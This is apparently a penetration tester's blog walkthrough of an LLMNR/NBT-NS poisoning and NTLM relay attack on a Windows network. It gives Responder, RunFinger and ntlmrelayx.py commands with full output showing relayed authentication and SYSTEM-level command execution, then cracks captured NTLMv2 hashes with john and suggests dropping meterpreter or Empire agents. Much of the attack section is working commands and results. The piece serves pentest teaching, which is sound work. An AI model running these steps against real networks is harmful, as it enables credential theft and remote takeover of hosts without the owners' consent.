Background
LLMNR & NBT-NS relay attack is a common way to compromise a Windows host by capturing hashes for cracking or relaying it to another host for authentication. This method is usually used when I can't find critical vulns like MS17-010. SMB relay attacks also requires a Windows host to attempt to resolve a SMB share or connect to a Windows Auth mechanism which will in turn invoke a NBT broadcast to the attacker machine. The attacker is listening using a responder on common ports, waiting to capture the smb hashes. More info here and here.
From experience, relay attack is usually a waiting game and of chance; you activate the responder to invoke/poison the network for LLMNR and NBT requests, at the same time, use a multi relayer like ntlmrelay.py to relay smb hash to a bunch of victim hosts. Next, is to wait and pray for a catch. In a large network, you are bound to get a bite in a matter of minutes.
Remember that smb signing must be turned off before this attack will work, so the best way is to run a fingerprint of the victim hosts first.
Enumeration Steps
On the attacker machine, run a responder to listen for incoming connections. Note: if you intend to use the responder-MultiRelay, edit /usr/share/responder/Responder.conf and disable:
SMB server
HTTP server
# responder -I eth0 -rwd
Successfull start of responder on attacker machine:
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3.3.9
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [172.16.6.11]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
Once responder is running, it will auto save smb hashes into /usr/share/responder/logs/, the hashes here can be cracked using john or hashcat. But we would like to relay the hash to victim hosts to execute our evil deeds. I couldn't get responder-MultiRelay to work so I am using ntlmrelay.py.
Firstly, comes the enumeration bit, I will identify hosts with smb signing turned off using this cmd:
# responder-RunFinger -i 172.16.16.0/24 -g > smb-hosts.txt
['172.16.16.64', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.63', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.66', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.34', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.74', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.77', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.79', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.80', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.71', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.70', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.89', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.76', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.56', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
With a bit of awk or cut or sed whichever you prefer, paste the ip addresses into a target file.
# cat smb-hosts.txt | grep False | cut -d \' -f2 > targets.txt
Multi Relay Attack
After formatting the targets, feed it into ntlmrelay.py.
# ntlmrelay.py -tf targets.txt -c whoami
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.241
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.241 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.27
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.27 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.28
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.26
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.28 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.248
[*] Authenticating against smb://172.16.21.26 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.13
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.248 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.16
[*] Authenticating against smb://172.16.21.13 as xxx\xxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.9 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Executed specified command on host: 172.16.21.17
nt authority\system
[*] Stopping service RemoteRegistry
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.0
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.0 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.3
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.253
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
If ntlmrelay.py was successful, you should get command execution on the hosts, as you can see above, the whoami returned a result. From here, you can target the specific victim and directly invoke a meterpreter or Empire agent on the machine or any evil cmd:
# ntlmrelayx.py -t 172.16.21.17 -c dir
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.17 as xxxx\xxxx SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.21.17
Volume in drive C has no label.
Volume Serial Number is 806C-3558
Directory of C:\Windows\system32
24/01/2019 01:27 PM <DIR> .
24/01/2019 01:27 PM <DIR> ..
21/11/2010 03:06 PM <DIR> 0409
19/12/2007 06:40 AM 3,774 2hps.ico
30/07/2013 02:10 PM 21,824 accelerometerdll.DLL
21/11/2010 11:24 AM 3,745,792 accessibilitycpl.dll
14/07/2009 09:24 AM 39,424 ACCTRES.dll
14/07/2009 09:40 AM 9,216 acledit.dll
14/07/2009 09:40 AM 154,112 aclui.dll
................
.........................Cracking Hash
If multi relay did not work for you, don't give up yet, you can always try cracking the hashes:
# cd /usr/share/responder/logs/
# ls
Analyzer-Session.log Responder-Session.log SMB-Relay-SMB-192.168.197.135.txt
Config-Responder.log SMB-Relay-192.168.197.135.txt SMBv2-NTLMv2-SSP-192.168.197.135.txt
HTTP-NTLMv2-192.168.197.135.txt SMBRelay-Session.txt
Poisoners-Session.log SMB-Relay-SMB-192.168.197.133.txt
Lets feed it into john:
# john SMB* -wordlist=/tmp/wordlist.txt
Using default input encoding: UTF-8
Loaded 10 password hashes with 10 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 8 password hashes with 8 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
qqqqqqqq (Administrator)
8g 0:00:00:00 DONE (2019-01-23 15:25) 800.0g/s 100.0p/s 800.0c/s 800.0C/s xxxxxxx
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Summary
There you go folks, responder or multi relay attacks should be part of your pen-testing arsenal. So remember to try it in your next engagement exercise.
